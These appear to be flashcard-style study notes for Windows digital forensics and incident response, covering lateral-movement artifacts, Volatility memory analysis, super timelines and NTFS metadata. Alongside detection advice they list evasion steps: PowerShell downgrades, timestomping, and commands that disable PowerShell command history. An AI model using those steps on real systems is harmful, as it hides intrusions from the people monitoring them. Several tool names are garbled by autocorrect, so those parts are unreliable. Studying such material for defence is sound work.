Evidence of event log tampering
They still exist in memory
Gaps in the records
You need admin rights
Two native ways to conduct lateral movement in Windows environments
Map network share (net use)
RDP
3 physical places Places where we find filesystem artifacts for RDP connections
Jumplists (AppData\Roaming\MSFT\Windows\Recent\Automatic\Destinations) –> mstc-appid shows all the Remote Desktop times/destinations
Prefetch files (on disk, not memory)
Bitmap cache (RDP puzzles!) cache##.bmc, cache###.bin in user directory, terminal server client/cache
What are we looking for in logs to see Remote Desktop SOURCE evidence, and what are the data sources?
Event logs, Registry, and file system
Looking for mstc.exe (MSFT terminal server client) execution
The presence of what file in a user’s profile is a good indication that RDP has been executed on that system?
Default.rdp
Tool to parse the RDP registry, which is?
Regripper “rdphint”
RDP key found in
NTUSER\Software\MSFT\Terminal Server Client\Servers
What type of logon event is created on a system that’s been RDP’d TO?
4624, Logon Type 10
Will also produce a 4778/4779 event, with the ip source, system name, logon user name
Names of executables that will be presented on destination even logs for RDP
rdpclip. exe
tstheme. exe
Users name directory will be created when….
any interactive login is conducted
Executables that will be visible forensically when windows admin shares are mapped, and where can we find them?
net. exe
net1. exe
Can be found in
event logs (Security, smbclient)
registry (mount points, shell bags, shimcche, bam/dam, amcache)
FileSystem (prefetch, user profile artifacts)
Key that shows the entire list of systems connected to by a user account
NTuser\Software\MSFT\Windows\CurrentVersion\Explorer\
MountPoints2
Why is 4672 presented on the destination for a connection to a remote admin share?
Because you need the privilege to be able to connect to an admin share, thus, 4672, privileged user breakdown
5 ways to execute malware on a host, using lateral movement techniques
PsExec Windows Remote management tools PowerShell/WMIC Exploiting a vuln Application deployment software
Popular malware like conficker, shaman, wanna cry, notpetya, etc look for what to be able to propagate?
Windows admin shares
Key artifact for PsExec usage in registry
The Sysinternals\PsExec\EulaAccepted key (NTUser.dat)
Any changes in the delta of what should raise eyebrows for legit users of PsExec (or for malicious use, really)
Any increase in the amount of Eula’s accepted, which should always remain relatively static. (Same amount of users)
PsexeSvc.exe is an artifact for what?
Being on the receiving end (destination) of a psexec connection.
receiving commands from WMI will produce what .exe?
What other files will be presented?
wmiprvse.exe
scrcons. exe
mofcomp. exe
manipulation of WMI repo will show up where?
System32\wbem\repository
good executable indicator of Powershell demoting?
wsmprovhost.exe
Full script logging for PS is available at:
PS 5 and beyond
Common tools for using application deployment software to deploy lateral movement software/malware
GPO, SCCM, Cloud control panels.
What does process tracking give you?
A running diatribe of processes that were executed, and who the parent process was - includes full command line processes (both cmd and Powershell.exe)
Problem with process tracking
HUGE amount of data, same as what’s in prefetch
What system baseline is the first to integrate process tracking?
WIn 7
Where does process tracking add content to?
Windows event logs: adds process information section
How do you see command line code in logs?
turn on process tracking, with CLI auditing. Will include the full script that was executed
How can you hide command line scripts even if process tracking/cli auditing is fully turned on?
Have the malicious script call script blocks, and have the necessary evil in a file in temp or wherever
Turn on what for power-shell specific logs?
Powershell script block logging, Powershell remoting logging
How can red teams get around PS logging?
downgrade Powershell to pre-PS5, where it was introduced. Downgrade attacks are very popular!
What is tracked in Windows-WinRM/Operational log?
WinRM connections, which is the primary protocol for Powershell Remoting
Records all commands typed and the output of those commands, for powershell
the transcript log. Records to the users documents folder by default. Only records input/output to the PS terminal
Tools meant to run on Powershell logs to detect obfuscation/encoding
Invoke-Obfuscation tool and Revoke-Obfuscation tool
A way to see a PowerShell “bash history”
PS saves it’s history in PSReadline ConsoleHost_history.txt
Stored at
%AppData%\Roaming\MSFT\Windows\PowerShell\PSReadline
Records last 4096 commands typed in PS console
What can bad guys do to keep you from seeing the PS “bash” (Command line history)
Set it to disabled in PS, or just remove the PsReadline Module
Do it by Set-PSReadlineOption -HistorySaveStyleSavenothing
Remove-Module-Name PsReadine
Best place to discovery evil WMI eventing
WMI-Activity log; look for EID 5861, new permanent customers.
You must be able to “whitelist” typical WMI activity in the environment
Problem with WMI activity log for finding WMI evil?
It doesn’t track processes or command lines, without that being turned on, and then it is tracked in security logs
What is AMSI?
Anti-Malware Scanning Engine; something that antivirus vendors can hook into for visibility. Windows 10+
Most modern way to export evt logs (4)
Zimmerman’s event log extraction tool
evt log explorer (command line version)
evtwalk/evtxtract carving tool
with Powershell, grab it remotely or locally: Get-WinEvent
Free blue team logging aggregation/forensic tool, from MSFT?
Sysmon! Easy configuration, filtering
requires a LOT of tuning.
What does Mofcomp do?
Can be used to create a WMI event for persistence (Creates WMI filters)
Great free database to break down/describe specific Windows event logs and their context
Ultimate Windows Security
EventID a good second option.
Ways to obfuscate Powershell script blocks can be found in
Invoke-Obfuscation and Revoke-Obfuscation
Open Sourced PowerShell script for deobfuscating other encoded PowerShell scripts
PSDecode
Option in cyberchef to decode strange/obfuscated portions
The “magic” option, which will try to do a first few passes on scripts to see what they’re supposed to be used for/attempting to accomplish.
Challenges with saving Powershell logs
The transcript logs are trivial to manipulate on a box (unencrypted in the users documents folder)
Powershell remoting limits the sharing of the logs over the network due to problems w/network authentication “double hopping”
Best to have it set as an automated forwarding (UF, filebeat, etc)
Powershell logs “bash history” get saved as….
…and what’s the downside?
PSReadline Console Host history. Stored in each user’s profile
No process tracking or script output
Evil in WMI logs can be found in
Look for New WMI Event Consumer Creation
Ways to look in WMI logs for evil
Look for evil DLL extending WMI capabilities
Look for uncommon words, software terms (Eval, activexobject, .vbs or .ps1 scripts, etc)
Exporting logs is challenging because…
Exporting tools will often partially corrupt log files
stored in binary form, so they need to be converted
Where does Sysmon store logs?
Creates a new log output dir, Windows-Sysmon/Operational
EDR that lets you connect to a remote host and attach a remote disk as local. Works directly with Linux. (Can attach a remote disk to a SIFT image)
F-Response
Kape is __________ program that does what?
Triage program: Collects files, and processes the files across its program set. Fasty, flexible, collects locked system files/shadow copies.
What are Kape “Targets”
the list of files for it to collect
Advanced capabilities of EDR to perform memory analysis leads to good visibility for
CLI artifacts Network Activity Process tracking/tracing DLL injection Rootkit insertion
Why is EDR’s access to memory critical?
Because much of the modern attack ecology is memory resident
Why is memory key to finding running processes?
You can hide executables on disk, obfuscated, but you can’t hide them from the processor. They have to be uncloaked to
As a cheat, in memory, you can collect executables from memory. How? (Rob Lee’s trick)
Dump all the executables, drivers, dll’s from memory analysis, and run antivirus/clamav at it.
Cant hide the raw in memory!
Best place to find malicious software activity
Memory samples; stuff injected into processes, or obfuscated, will be easier to find in memory. (Harder on live host)
Why is memory collection/analysis hard to do? (why is it brittle)
It’s tied to specific profiles and variations of operating systems.
Options for acquiring memory from running (live) systems
F-response (and SIFT) Winpmem (Velociraptor) Dumpit (CLI from USB) Belkasoft Magnetforensics
Options for acquiring memory from dead box?
Hibernate file (hiberfi.sys)
Swapfile.sys
Pagefile.sys
Windows Memory Dump (%WINDIR%\Memory.dmp)
Difference between memory collection on a Hyper-V image and a VMware/Parallels image
On VMWare, you can just grab the .vmem file
On Hyper-V, you have to attach a process (like Winpmem or F-response) and pull memory like you would any other running system
What is a hibernation file on windows?
A fully compressed copy of memory (RAM) at the moment of hibernation.
Some tools can uncompress it. (Volatility) Some can just process it natively.
Difference between a PC sleeping and hibernating?
Hibernating isn’t a normal thing:
only occurs from loss of power/power about to drain out of device
or for shutdown/fastboot.
When installing new files/programs (recovery functions)
Why Windows 10 being on a regular update schedule makes memory forensics harder? Why?
Every new major update changes it’s memory profile, for tools, making them less effective.
Things like artifact formats (prefetch, shim cache) change!
Also, hibernation file formats and use changes. (It’s not used as frequently any more)
What is Virtual Secure Mode, and why does it affect memory acquisition?
Windows 10 feature. It protects the kernel and user mode components, which often block the insertion of the driver necessary to do the memory acquisition
Problems with Windows 10 memory file acquisition using Hibernation files?
Data is zeroed after return from hibernation
Hibernate files only keep smaller (and less interesting) files for Hibernate, HybridSleep. (40% of total memory space) BUT they’re kept more often! Stored in case of power loss.
Fast Startup mode only holds for reboots, about 20% of memory.
Where is hibernate files backed up to?
Trick question! Nowhere. It’s not backed up in VSS.
Core components of what we find in RAM
Kernel Processor Control Region (KPCR)
Kernel Debugger Data Block (KDBG)
Directory Table Base (DTB)
Can create volatility environment variables for what?
Things like image location, with a file path, or a specific O/S profile (Win10, update 6, etc)
How to:
Recover metadata from a memory image
- Determine the OS and service pack/update (profile info)
- Find date and time when memory was acquired
Volatility plugin -imageinfo
what is volatility’s –profile for?
telling it what O/S and build number/service pack the memory sample is from
Alternative to imageinfo plugin to find the O/S of a memory image w/Volatility
kdbgscan plugin
Signs you picked the wrong volatility profile
Pslists, pecan, filescan, and hiveliest don’t return sane results or gibberish
Uncompress and converts Converts hibernation files and crash dump files, as well as snapshots/vbox memory, to raw memory images in volatility
imagecopy plugin
During step 1 of memory analysis, which is…… we start with looking at these process blocks
EPROCESS blocks, which show the file links (forward and backward) to parent and child processes
Items to look for when analyzing processes
Name - Spelled correctly, legit process
Path - Running from correct dir
Parent process - what you’d expect
command line - arguments and switches make sense
Start time: was it started at boot, near attack?
SID - do the SIDs make sense? Are system/user account SIDs launching correct processes?
Specific plugins for finding rogue processes in volatility
malprocfind - automatically identify suspicious system processes
processbl - compare processes and loaded DLLs with a baseline (a known good image for comparison)
Good way to compare processes w/volatility to a known good image
processbl ; run against a baseline image
How to identify processes that are hidden or no longer running in volatility? Why would things appear here?
Use the psscan plugin
Rootkit detection
may have crashed or not cleanly exited
Useful plugin for identifying processes spawned by the wrong parent in volatility
pstree
Useful way to identify webshell commands using volatility
Use PStree: see commands being sent by the parent web process.
Limitation of the malprocfind volatility plugin
It only looks at common system processes: items like cars, wnnlogon, services, lass, etc.
Three plugins used to baseline in Volatility
processbl
servicebl
driverbl
Can be run to tell you what the “diff” between the image is, or, what matches. (The latter can be useful for showing the same driver, but with different paths, etc)
Conducting research into what DLLs, registry key access, network sockets, and memory areas used by processes is found in its
Windows Process Objects
Handles within process objects contain what info?
Pointers to a resource
Directories and Registry keys access by a process
Mutex/Semaphores (access to objects)
Events
Seeing a processes memory areas used can be found in…
memory sections of a process object (volatility)
Getting directories and registry key access, events, and object access from a process is found with what plugin for volatility?
handles (Prints the list of open handles)
Prints the loaded dlls for each process in volatility
dlllist
Scan memory for windows service information in volatility
svcscan
How to see the command line associated with a running process?
in volatility, use dullest to display the loaded dlls and command lines
How to extract a specific DLL for analysis with volatility
use dlllist to identify a specific DLL (and its base offset) and then use dlldump to extract it.
Why do we want to look at the access tokens for a process? How?
Give us the running user of the process, and the relative authority given to the overall process.
use getsids plugin to see token info, which shows you the account Sid AND the group info
How to find process SIDS, which would show you system processes running with a user context?
getsids
LOcalSystem SID
S-1-5-18
NetworkService SID
S-1-5-20
Administrator group SID
S-1-5-32-544
User group/guest SID
S-1-5-32-545
Guests:
S-1-5-32-546
Handles in a process is all of the…..
Nouns.
Files, Objects, Keys, etc.
Limits to looking at process handles in volatility, and a way to navigate it
there’s hundreds or thousands per process
-t (gripping the file) can limit it to File or Registry Keys for quick wins
What is a mutex/mutant?
Type of process structure: it’s a governor.
Processes will use it often as a flag so that if you run a second copy of the process, it won’t launch. (Wont need to instantiate another version of it) Malware uses it to prevent multiple infections/dos’ing yourself.
Make great IoC!
Well known malware will ________to say, regardless of version, that a copy of the malware was installed and running.
use a mutex flag
Carbon Black and Falcon, etc will look for these. When intel produces it as an IoC for malware, can load it as a yara signature
When Threat Intel/Malware analysis produces a mutex, what can be done with it?
Make a yara signature and sweep for that flag, as it’s usually a solid IoC that the malware was installed on the host
Some things to look for with the svcscan plugin for Volatility
Scan for service records, with associated info on processes and drivers.
Can look for windows services that are used as a persistence mechanism: Auto starts, etc. Can also find services that malware stopped. (Like antivirus services being stopped)
the verbose option will identify the DLLs used by services.
Some things to look for in network sockets established by processes?
Things that aren’t web browsers that are connecting on 80,443,8080
Eliminate product updates.
Focus especially on anything RDP or DNS to unusual names
Where would you see internet explorer using weird protocol ports? (in memory)
Using network sockets for a process that are opened. use iexplore/edge opening sockets to a weird port
Whats “poker hands” as they relate to network sockets
Look for 4444 or 5555, or straights (4567) because those tend to mean something/suspicious
RPC connections between workstations is weird, because
workstations don’t fully establish RPC connections to communicate natively in AD environments!
What is a service opening a connection to itself (127.0.01:random to 127.0.0.1:3389)
Evidence of port redirection. (Netcat shoveling, etc)
Plugin for volatility to give you connections and sockets (versus just list of tcp connections)
netscan
What types of connections are returned from volatility’s netscan plugin
both active and terminated connections - pay attention to the process.
First thing that should flag in your mind when you find evidence of code injection
Something, on the system, that is causing the code injection. (Aircraft carrier during pearl harbor analogy; for planes to get there, they had to have been carried somewhere. Must be an aircraft carrier somewhere)
spearfish code; initial access.
Why use code injection?
Camoflagues code Access memory/permissions of target system Process migration Evade A/V and Allowlisting Facilitates complex attacks (Rootkit)
Simple code injection techniques are ____ to find for manual memory analysis, versus more complex techniques, which are ______ to find.
Simple code injection: easy for A/V, EDR; hard for manual
Complex code injection: harder for A/V/EDR find, much easier to find manually
Three very common types of code injection, and how they work
Simple code injection: Writing into existing DLLs or code
Reflective DLL injection: Loading code independent of host processes. (For example, meterpreter uses it’s own loader) Powershell can do this, too.
Process hollowing: starts a suspended service, carves out a section for new code, and then starts service. Much of the code (like DLLs, handles, etc are from original process, making it harder to see)
Loaded a service in the suspended state, carving out some space for new Code, and then launching it is an example of
Process Hollowing
VirtualAllocEX() and CreateRemoteThread() and SetWindowsHookEx() are techniques found in what, and what do they do?
Simple Code injection (DLL injection)
They create space in the DLL, on disk, and write in new code.
When does the injected DLL usually get caught, by signature based methods?
When it gets loaded from the volume it lives on into memory, and is checked.
Why is reflective techniques easier for manual review, but harder for automated techniques?
Its easy to see DLLs that aren’t loaded from file, or loaded from a standard location. DLLs loaded in unusually way are glaring beacons of weirdness.
For example, DLLs loaded down from memory dont have a source file on disk!
Two popular plugins for finding DLL injection
ldrmodules
Malfind
What does ldrmodules do in Volatility?
Detect unlinked DLLs and non-memory mapped files
Checks the “DLL manifest” of the PEB (Process Execution Block) and finds DLLs that were removed from the manifest, or unlinked.
Look for DLLs with no “MappedPath” info
what does malfind do in Volatility?
Finds hidden and injected code, and will dump affected memory sections
What is a lack of a “mapped path” or a weird path for a DLL in the PEB indicate?
That it was not loaded using the Windows API, or loaded in some unusual way. (Often indicative of a DLL injection attack)
What’s special about executable code in the ldrmodules plugin of Volatility?
They will flag as “false” for InInit, because they’re executable.
Stuxnet uses what type of code injection? Why is this easier for manual review?
Process injection
Can find duplicate examples of dlls that should only have 1 version of it, which is glaring
In memory, the lack of a mapped path from where the DLL was loaded combined with it not being on the PEB (manifest) is a red alarm light
What does the “Base” section of a ldrmodules volatility plugin output?
the memory section it’s present in. (Will be mapped to the Process Execution Block, PEB, for legit DLLs)
What is reflective code injection? Who uses it?
When you can get arbitrary code execution (injection into a process) without using the Windows LoadLibrary code.
Manage to get code into a process/DLL w/out using Windows process.
Metasploit, Cobalt Strike, Pulsar, etc
Easiest way to detect reflective code injection?
Manual memory analysis! Because most security tools are looking at manipulation of the Windows loader API, these techniques when successful are harder to see, but glaring in manual memory review. (malfind)
Malfind (volatility) goes through ______ to perform its checks.
Memory, every process, and looking in “mapped Path, page execution read/write” which is a section that and looks for anything that’s marked as being executable
Then, looks for a section on disk mapped to that executable.
Malfind is good for finding
reflective types of code injection techniques
Like on a file system, marking a file as being executable, but for code in memory
The VAD tree MappedPath section that Malfind looks at
What volatility plugin dumps extracted files it deems potentially malicious, and how?
Malfind: –dump-dir=
When executables are dumped out of Volatility’s malfind search, what is the first thing it does to check to see if the dumped files are code?
the “MZ” Header is usually indicative of code.
MZ is indeed the characteristic signature of a .exe file:
The DOS MZ executable format is the executable file format used for .EXE files in DOS.
The file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the beginning of the file (the “magic number”). “MZ” are the initials of Mark Zbikowski, one of leading developers of MS-DOS.
How does modern malware try to hide from the malfind executable dump?
Malfind only shows a preview of the first 64 bytes; can start with nonsense, then have a jump/redirect later to the code.
By manipulating the file with memory reads, so that the first two bits aren’t the standard MZ header, but that it jumps to it under conditions. Advanced stuff.
Peanut Butter and Jelly in code example
Take a piece of bread
PB on bread
Jelly on PB
Take a piece of bread and put it on the jelly
Code in assembly often has the same instruction as the one below, can see a discernible sequence.
How to avoid malfind counter-measures?
USe –dump-dir options that outputs the entire contents, vs. just the 64 byte header.
Can also just scan the files, or set up yara scans.
Two plugins for detecting process hollowing in Volatility
Hollowfind and threadmap
Volatility looks for Rootkits by looking for kernel hooking in what plugins
modscan: finds modules via pool tag scanning
apihooks: Finds DLL function hooks
psxview: finds hidden processes via cross-view tech
ssd: displays system service descriptor table entries
Requirement for Rootkit hooking
Has to be signed code, so it can get into ring 0 process
Displays hooked functions with the System Service Descriptor Table (Windows kernel hooking) (Rootkits)
ssdt module of volatility
Key first step to finding Rootkits in the SSDT table, and eliminating “known goods”
grep out entries with ntoskrnl and wn32k, which are normal mods.
DKOM is a process to….
Hide Rootkits by removing them from the EPROCESS double linked list. (Forward link, backward link)
Finding DKOM (process hiding) is checked with
psxview; checks the splits and psscan output against what’s running a thread.
Scans memory to image to find loaded, unloaded, and unliked kernel modules (drivers)
modscan/modules plugin of volatility
Diffs drivers vs. known good drivers
driverbl plugin to volatility; like servicbl, lets you compare it against a known good baseline image
Can be used to manipulate calls to the notepad, microphone, font renderer, and others in order to “spy” on things discreetly.
How would you see these calls?
the Windows API, which can be “hooked”
Find these hooks with the apihooks module of volatility
These hide the existence of system objects like processes, files, reg keys, and network artifacts
Rootkits
idp and driverirp are use for
unlinking and identifying api hooking
Best way to extract processes, drivers, and objects
dlldump moddump procdump memdump cmdscan dumpfiles filescan
how to scan memory samples for file objects (docs, pdfs, etc)
filescan
how to extract files (docs, pdfs, etc) from memory by name or physical offset
dumpfiles
Can extract kernel drivers from a memory sample
moddump
Profile to dump out history for specific processes; for example, get the chat history for a Skype process, or command line history (from conhost)
memdump, or vaddump. (Will dump memory sections owned by a process to a file or group of files)
What can we do with a memdump sample, from the volatility plugin?
can do strings/unicode extraction; can pull useful commands out of the sample (using grep on the extracted filename)
How to extract the console output/command history from memory?
Use cmdscan and consoles plugins, and run strings/greps against that output. (Better resideue of command_history and console_information)
Memory analysis tools other than Volatility (live systems)
Recall and GRR/Velociraptor (Free EDR tools)
Allows you to create indicators out of memory dumps
yarascan
Tool for extracting ascii and unicode strings from memory dump files
bstrings - handles regex, too
Three main pieces of a super timeline
FileSystem data
Windows Artifact Data
Registry keys
What is a “pivot point” in timeline analysis?
An event, malicious or otherwise, in which you can see a group of threat actor activity just by “temporal” analysis
Tool for extracting the metadata from a system, only
Fls or MFTEcmd
Tool for creating a super timeline, creating the standard file system metadata extract as well as extra enrichment data
Plaso (log2timeline)
Contains filesystem artifacts, artifact timestamps, registry timestamps, and works on all O/S variants
Four timestamps for an NTFS file
m - Data content change time (modified)
a - Data last access time (accessed)
c - metadata change time (MFT changed)
b - metadata creation time (Created)
What is a “MACTime” column in a timeline for?
The specific timestamp that was modified:
Modified
Accessed
Changed
Birthed (created)
Tool that lets you interact with a forensic image as if it was a normal filesystem
FLS
What is a body file?
a master timeline with relevant data from all the individual images
3 main types of data collected from filesystems
- Allocated files (Normal files)
- Deleted files (Files deleted normally, but still have structures; file path name, permissions, timestamps)
- Unallocated inodes (Orphan files, with no structure.
Sort the data from a filesystem collection tool (body file) into a usable segment to analyze with…
Mactime tool (perl script)
Steps for timestomping
Manually set the Standard Information attributes
Copy the file to another folder
Manually set the Standard Information attributes (some will change during the move)
What is time stomping?
Manually setting timestamps (using file copy operations) to change the times, cover up when it was actually done
3 Parts of Log2timeline
The log2timeline binary, which extracts timelines
pinfolds: displays storage metadata
sort - sorts and processes output
What does Plaso do?
Uses Log2Timeline, but pulls relevant forensic data from ALL the places
LNK Jumplists All Browsers webhistory Registry )shellbags, mountpoints. services, autoruns; terminal server. task scheduler, etc etc) Prefetch Shimcache Winfirewall and many more
What types of web artifacts does Plaso pull out?
everything. Cache, cookies, history, etc, from all browsers
How to import additional file system details into Plaso
mactime parser
Things log2timeline can look at
Mount point Image Kape output directory partition etc
How does Plaso handle volume shadow copies?
When it detects, it will ask if it wants to extract them in the timeline.
Have to be careful, it slows down analysis a lot.
Ways to streamline log2timeline
Can use a filter file, or just use specific parsers (just MFT, or just specific registry key, or trigger if it finds certain things)
How does log2timeline filter?
Use pipe for OR, also the .+ will recurse something in the directory. Lets you set wildcards and conditions for directories.
EX: /(Users|Docs and Settings)/.+/NTUSER{.}.DAT
SANS provided filter file for log2timeline…
Uses 99% of the standard use cases for extractions. Conditions found in cape. Looks for see idic things in memory, registry, LNK, Jump lists, prefetch, specific Event Logs, MFT entries, ec.
How would you let Plaso know that you want to skip collecting something specific, like winevt logs or recycle_bin, or chrome cookies?
in the –parsers command line switch, do a -
log timeline.py –parsers parsers “win7, -winevt”
Tools for sorting a super timeline generated by Plaso
pinfo.py and psort.py
Pinfo.py does what?
Takes a plaso dump and tells you what’s in it, and how big it is.
Shows you what parsers have been run and what’s inside each file, how many events
What are lnk files?
Shortcut files.
what does Psort.py
Sorted the data output from Plaso. Can use it to “date bound” the results. Can also change the output type. (CSV vs. xlsx.
Can also sort it into a specific timezone, ie EST/PST
Steps for creating a sample super timeline
Mount the remote system drive
Extract with log2timeline.py (with parsers we care about)
Filter the timeline w/psort to the range of time you’re interested in.
Steps for creating a sample super timeline for a phishing attack
Mount the remote disk w/f-response
create timeline w/ standard windows filters, with log2timeline
gather the filesystem data, with MFTECmd.exe and create a body file
parse the body file with the maytime parsers (log2timeline)
sort the data for the date range you’re interested in
How does SANS recommend coloring the super timeline?
Red for evidence of execution Gray for event logs of interest Yellow: web history Blue: USB usage Black for deleted items Light green: file opening dark green: folder opening
What does MACB stand for?
Modified, accessed, (MFT record) changed, birthed.
5 anti-forensic techniques for filesystem hiding
Timestomping File Deletion (Delete) FreeSpace Wiping Data Encryption (.rar) Fileless malware
Manipulating registry keys or deleting them, or hiding scripts in the registry, are examples of
Registry anti-forensics techniques
How long will a deleted file hang around, on average, once it’s deleted?
SSDs and Disks will cleanup via optimization or drive “trimming” which wipes out unallocated storage areas, which zeroize deleted files. Around weekly, or less depending on how long it’s been.
Expect 72 hrs.
Best place to find deleted or wiped files
outside of 72 hrs, residue will likely exist in the volume shadow if at all
Very common anti-forensics/hiding technique for Powershell scripts
Registry key, as a download cradle type abbreviated script
Why is the registry a poor place to hide Powershell scripts?
It’s a database. It acts like a mini-file system; when the key is deleted, it will exist as unallocated space forever. It leaves permanent forensic residue, indefinitely.
Anything that is a filesystem works this way, without defragging/disk cleanup.
How do things get removed from a PST file? (old deleted/archived email items)
When it’s COMPACTED. Compaction removes deleted files, which would cover forensic residue, but create it’s own record of being compacted.
Privacy cleaners vs forensics
Ineffectual. They will clean out your files, but not delete them forensically; in fact they point out specifically what was deleted
Easy way to search for hidden scripts someone is trying to hide in a registry key
Use registry explorer (or regcmd, the Zimmerman tool) and search for anything that has Base64 in values above a specific length, like 400 characters; scripts are unusually large for a key.
Way to speed up cataloguing the event logs
Use the –vss option; looks at all 3 versions, dedups, and catalogs them.
Equivalent to virtualization snapshots. (Point in time)
the Volume Shadow copies. Usually have overlap with each other.
Volume shadow database is usually ____ sized
about 3-5% of the hard drive.
When does volume shadow “snapshot” occur
For servers, daily
For workstations, 3-6 that cover about a week; triggered on installation of software, reboots, events
tools for working with VSS files
Convert to VHD for analysis
use iSCSI and mount it to SIFT
vshadowinfo, vshadowmount
Best O/S for doing volume shadow work
SIFT; it does a better job of ignoring permissions, seeing everything. (Windows APIs respect windows permissions)
Command used to mount VSS in SIFT
ewfmount to see the mount points/ vshadowmount to mount them
3 steps for mounting shadow files
Attach the remote system drie
vshadowmount /dev/sdc2 /mnt/vss
Make a for loop, mount every individual VSS “drive” to a Linux file point
Why dont we see $MFT, $EXTEND, etc
The O/S hides them. (Truly hidden) if you mount a disk imagine on Linux, it will ignore those MSFT rules and expose them.
How do you see the $MFT?
You have to look at it on a non-windows (Linux) machine, mount the drive for analysis, and it’s there, BUT NOT EXPOSED BY LS command?!
What is the $MFTMIRR on an NTFS volume? How is it different?
A backup copy of the MFT. Only contains the first 4 records.
What is the $LOGFILE on an NTFS volume?
Transactional logging file
What is the $VOLUME on an NTFS volume?
Contains the volume name, NTFS version number, and a “dirty flag”
What is the $ATTRDEF on an NTFS volume?
Contains the attribute definitons
What is the $BITMAP on an NTFS Volume?
Tracks allocations (in-use versus free) of each cluster in the volume
What is the $BOOT on an NTFS Volume?
MBR
What is the $BADCLUS on an NTFS Volume?
Something that tracks bad/defective clusters so NTFS won’t use them
What is the $SECURE on an NTFS Volume?
Tracks all the security information for files on the volume (Security manifest)
What is the $EXTEND on an NTFS Volume?
A directory containing $UsnJrnl, ObjId, $Quota, $Reparse
What does the $MFT contain on NTFS?
Metadata catalog; think of it as a Dewey Decimal Card Catalog. (where is book stored, when was it last checked out, etc)
contains data that describes files. Pointers to data layer for files, MACB times, permissions. Everything has a numeric address.
How does the MFT provide “addressing”
Shows where stuff lives on the disk; what cluster. It’s an index number. If the drive is fragmented, what fragment does the data/file live on. What’s the starting number for the volume, what’s the end number.
Each MFT entry is a fixed length ($EXTEND, $BOOT, etc) and it’s structured how?
1024 bytes. Databases.
What happens when you delete files, to their record in the $MFT?
For NTFS volumes, those records get a bit flipped that it’s “allocated space” and now is “unallocated space”
Those entries remain until they’re overwritten by new entries.
How would you identify something from a MSFT O/S in the MFT that’s unusual?
Files are recorded in the MFT by inode in alphabetical order, typically. Items that were added to directories like System32 (core Windows files) will show up as far outliers. (Or be grouped with the non-native programs)
How does the $MFT reflect a TA adding files in two separate physical places on a disk?
Sequentially. Since the MFT records them contiguously into the catalog, it can be used to find values that are close to each other, representing related files or malware in two separate places.
What does the linux xxd command do, and how do forensicators use it
creates a hash dump of a files contents, so you can view magic numbers and such
“When you’re trying to make sense of a binary file format, a good hex viewer or hex editor is an invaluable tool. As shown in “Ultima 1 Reverse Engineering: Decoding Savegame Files“, a typical workflow involves viewing a hex dump of the binary data, making some small change, taking a second hex dump, and comparing the differences. If you’re lucky, you might even be able to observe patterns in the data directly.”
What can you see in the hex dump of an MFT entry?
the “FILE” signature: 46 49 4c 45, where the entry starts. (can see FILE0 in the readout)
Can see the sequence number, node entry number.
Every file in the MFT has what standard attributes?
$STANDARD_INFORMATION
$FILE_NAME (long and/or short)
$DATA
What’s in the $STANDARD_INFORMATION of a MFT entry?
What type of file it is
MACB times
ARCANE RULES OF NTFS timestamps
What is kept in the $FILE_NAME of a MFT entry?
Unicode name of the file, what folder is it found in.
MFT manipulation (Timestamps) can be found by
- Using MFTcmd and running the timestamp anomaly engine. Will find lack of sub second precision, differences in timestamps.
- Can run a scatterplot of times things were created, inode creation time.
what does sorting by inode table, with ls -li, in the MSFT for a windows system tell you?
It should show you a sequence of all the binaries/dll installed at the same time (install!) and then the outliers.
What can be found in the $DATA part of the MFT?
the Data run: starting location, and length, of a data section on a cluster.
Is Resident will tell you whether the data lives in a space on cluster, or (isResident) is stored on the MFT itself.
What is a Zone Identifier 3?
It’s a flag marked in the MT, in the MFT, as an evidence of download. It’s marked as data that was downloaded from the internet.
Tools for looking at the metadata of a file, for NTFS systems
itstat
Shows the SID of the file, nanosecond-accuracy MACB metadata inode number, etc.
What is the problem with file wiping?
Does wipe as much as you think: it overwrites the content of the file, and scramble the MFT entry. It does NOT, however, get the second language of the MFT info, which is the directory. (just the file, which shows as zzzzzzzz in the metadata, but the directory folder has the file name/MACB timestamp)
Where can you find the file folder metadata to find files that may have been wiped?
i30
Directory folder; shows the file data and the deleted file information. FTK imager shows this! The slack space of a directory file will contain the file name and file metadata.
File system metadata is another place to look.
The slack space of a directory file will contain
….the file name and file metadata for files in it.
Where are file directory metadata files stored?
Stored in an index called $I30
What are the two parts of the $MFT directory information indexed?
$I30
INDEX_ROOT: directly in the MFT
INDEX_ALLOCATION: Stored as separate index chunks for large directory listings, like System32
How are file names stored in the directory index? $I30
It’s all stored as per-record list of files, with the MACB time stamp.
Tool that parses slack space in directory structures, and what is the output?
WISP windows Slack Parser
Directory file extraction timeline, with MACB values of the files.
What facility in NTFS records all the changes to metadata?
the Journal; can be used to identify the prior state of files. Like VSS, it’s a time machine.
With VSS, this NTFS function allows us to peer back in time
USN System journal; can be combined with the MFT and $Logfile transactions to find files and what happened when
What two things are tracked in the $UsnJournal
changes to the volume.
$Max - pointers that tell the system where to start reading the disk
$J - enteries for each file that has changed since log was started
couple tools for parsing the UsnJournal
MFTECmd (Zimemrman tool)
ANJP (Advanced NTFS Journal Parser)
jp (Journal parser)
GUI tool that parses the USNJournal, the MFT, and the $Logfile, into a consolidated view
ANJP (Advanced NTFS Journal Parser)
What does the paid version of ANJP do?
It automatically flags things like open outlook attachments, Skype downloads, disk wiper artifacts, etc. (The email attachment is hard to see anywhere else)
How to see forensically that someone opened an email attachment?
Volume Shadow or disk, MFTs, using ANJP to see the access to the file/action.
How is a file written to disk? 6 steps.
$Bitmap is scanned for a cluster to write to
$MFT record created
$Bitmap updated to show where clusters are allocated.
$I30 of parent directory is updated.
$USNJrnl updated
$logfile updated with this transaction.
What data still exists after a file is deleted in NTFS? (Sneaky spots)
Data clusters marked as unallocated in $Bitmap, but data is intact until the cluster is reused
- Slack space
- MFT record flags, $LogFile/UsnJrnl still have a record
- $FILE_NAME attribute is preserved until overwritten
- $I30 index entry
